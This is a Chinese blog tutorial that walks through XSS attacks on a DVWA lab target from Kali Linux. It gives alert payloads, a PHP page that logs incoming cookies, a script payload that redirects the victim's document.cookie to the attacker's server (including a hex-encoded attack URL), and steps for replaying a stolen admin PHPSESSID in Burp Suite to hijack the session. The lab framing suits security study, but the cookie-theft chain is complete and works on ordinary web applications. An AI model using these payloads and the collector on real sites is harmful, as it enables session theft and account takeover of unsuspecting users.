Kali-用户Cookie信息并实现无账号登录

作者 : icbug 发布时间: 2020-06-7 文章热度:205 共2679个字,阅读需7分钟。 手机浏览

目 录

大家一定都经历过乱七八糟的不良网站的弹窗吧!

这种网站一般都含有xss的攻击代码,只不过是被打了伪装而已

本章就会为大家介绍一下,这其中到底暗藏着什么玄机

首先我们需要一个DVWA靶机

搭建教程:https://icbugblog.cn/archives/8/

注意:这个教程涉及到mariadb需要自己创建一个新的用户才可以使用


搭建好靶场后我们开始我们的教程

首先我们先把DVWA的安全等级调为Low,方便我们开始XSS的基础学习

Kali-用户Cookie信息并实现无账号登录-icbug创客


反向XSS的原理

我们来演示一下它的工作原理。这个功能类似一个留言板,输入信息后下面会增加对应的信息

Kali-用户Cookie信息并实现无账号登录-icbug创客

然后我们查看一下地址框上的url链接

Kali-用户Cookie信息并实现无账号登录-icbug创客

根据回显信息判断出,显示的文本内容是 Hello $name。我们输入的信息被存放在$name 变量中

我们来添加一条Javascrpt的Js代码来获取我们的cookie

<script>
alert(document.cookie); #alert 弹出窗口,窗口中内容是 cookie
</script>

或者

<script>alert( "我是 icbug" );</script>
<script>alert(document.cookie);</script>

然后我们把这段代码放到这个框中运行,它会弹出两个对话框,我们可以看到他的回应是Hello

Kali-用户Cookie信息并实现无账号登录-icbug创客

我们来看第二个对话弹窗

Kali-用户Cookie信息并实现无账号登录-icbug创客

说明我们的网站有XSS漏洞,他把我们的cookie给显示了出来


储存型XSS的原理

存储型 XSS 的优势在于恶意代码被存储到服务器上,比如我们在论坛发帖的过程中嵌入了 XSS 攻击

代码,当我们发布的帖子被用户浏览访问时就可以触发 XSS 代码。

做一个示例:

Name:icbug

Message:alert(document.cookie);

一个站点,能写入并被执行,就可以被渗透!

例子:

Name:icbug的blog

Message:2020年最新的教程 alert(document.cookie);

然后我们使用XSS stored进行操作

Kali-用户Cookie信息并实现无账号登录-icbug创客

然后我们来看一下结果

Kali-用户Cookie信息并实现无账号登录-icbug创客

Kali-用户Cookie信息并实现无账号登录-icbug创客


揭秘黑客是如何盗取用户的cookie信息保存到服务器中的

在 kali 上构建 Web 站点接收 Cookie

先启动apache

Kali-用户Cookie信息并实现无账号登录-icbug创客

进入网站根目录

cd /var/www/html

然后新建一个用于接受cookie信息的PHP

vim index.php

写入

<?php
$cookie=$_GET['cookie'];
file_put_contents('cookie.txt',$cookie);
?>

注:页面中创建 cookie 变量,然后将 cookie 变量写入 cookie.txt

然后修改一下网页的权限

 ps -axu | grep apache

查看运行 apache 进程的用户名

授予权限

 chown www-data:www-data index.php

创建cookie.txt

 touch cookie.txt

给cookie.txt授予权限

chown www-data:www-data cookie.txt
 service apache2 start

URL构建

利用 xss 反射漏洞进行攻击

我们接收 Cookie 的 Url 为http://192.168.1.199/index.php

构建 XSS payload

<script>document.location='http://192.168.1.199/index.php?cookie='+document.coo
kie</script>

我们的完整URL是:

http://192.168.218.132/dvwa/vulnerabilities/xss_r/?name=%3Cscript%3Edocument.location%3D%27http%3A%2F%2F192.168.1.199%2Findex.php%3Fcookie%3D%27%2Bdocument.coo+kie%3C%2Fscript%3E#

这样的话浏览器有时会拒绝,所以我们需要用payload对url进行加密


打开burpsuite

Kali-用户Cookie信息并实现无账号登录-icbug创客

把我们需要加密的代码复制进去并按照下图下图操作(注意是script代码不是加密网址)

Kali-用户Cookie信息并实现无账号登录-icbug创客

然后把输出的URL进行拼接

拼接完成后如下

http://192.168.218.132/dvwa/vulnerabilities/xss_r/?name=%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%27%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%31%2e%31%39%39%2f%69%6e%64%65%78%2e%70%68%70%3f%63%6f%6f%6b%69%65%3d%27%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%0a%6b%69%65%3c%2f%73%63%72%69%70%74%3e

注:这个加密链接想直接访问,必须提前登录上 DVWA 链接。

访问后跳转到了一个空白页面,这个空白页面就是我们获取cookie的程序

http://192.168.1.199/index.php?cookie=undefined

Kali-用户Cookie信息并实现无账号登录-icbug创客

这个时候我们的cookie就已经传到了我们的cookie.txt文本中

然后查看一下我们的cookie

 cat /var/www/html/cookie.txt

这个是我们的Kali Linux的那台cookie获取机的查看代码

因为我们没有使用cookie调用所以返回代码为undefined

Kali-用户Cookie信息并实现无账号登录-icbug创客

同时我们看到地址栏中也是undefined,说明我们的cookie已经读取成功了


然后我们开启burpsuite 截断

Kali-用户Cookie信息并实现无账号登录-icbug创客

然后我们配置一下Kali的火狐代理

Kali-用户Cookie信息并实现无账号登录-icbug创客

DVWA 中内置了一些其他用户,在 kali 系统中打开火狐浏览器,这里我们使用

用户名:smithy 密码:password 登录 DVWA.

Kali-用户Cookie信息并实现无账号登录-icbug创客

打开 burpsuit 放行第一个请求,因为该请求携带用户名和密码

Kali-用户Cookie信息并实现无账号登录-icbug创客

将存在 Cookie 信息的请求发送到 Repeater 进行重放攻击

Kali-用户Cookie信息并实现无账号登录-icbug创客

替换用户 Cookie 信息

将现在的普通用户的 cookie 信息替换成前期抓到的 admin cookie 信息

admin 的 cookie 信息是:

Security:low PHPSESSID :up79966c556rikm9kfcsfbv2u7

开始替换:

进入 repeater 中继中

Kali-用户Cookie信息并实现无账号登录-icbug创客

点击 Go 返回状态码 200 表示成功

Kali-用户Cookie信息并实现无账号登录-icbug创客

点击 Show response in browser 在浏览器中打开。

Kali-用户Cookie信息并实现无账号登录-icbug创客

点击 Copy

Kali-用户Cookie信息并实现无账号登录-icbug创客

浏览器中访问

Kali-用户Cookie信息并实现无账号登录-icbug创客

成功切换为 admin 用户


The End...

常见问题FAQ

本站资源是否全部免费?
本站文章和普通速度下载资源免费,高速下载资源和讲解视频需要成为SVIP才能查看哦!
本站采用标准 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明!
icbug创客 » Kali-用户Cookie信息并实现无账号登录

发表评论

CAPTCHAis initialing...